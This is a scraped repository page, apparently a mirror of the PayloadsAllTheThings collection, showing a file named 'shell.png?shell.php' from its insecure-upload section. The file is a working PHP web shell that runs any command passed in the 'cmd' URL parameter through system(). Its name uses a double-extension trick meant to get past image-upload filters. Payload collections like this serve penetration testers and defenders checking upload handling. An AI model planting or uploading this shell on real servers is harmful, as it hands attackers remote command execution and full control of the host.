This website requires JavaScript.
Explore
Help
Register
Sign In
daffainfo
/
PayloadsAllTheThings
mirror of
https://github.com/daffainfo/PayloadsAllTheThings.git
Watch
1
Star
0
Fork
You've already forked PayloadsAllTheThings
0
Code
Issues
Packages
Projects
Releases
Wiki
Activity
2148c89452
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.png?shell.php
2 lines
44 B
PHP
Raw
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
Reference in New Issue
View Git Blame
Copy Permalink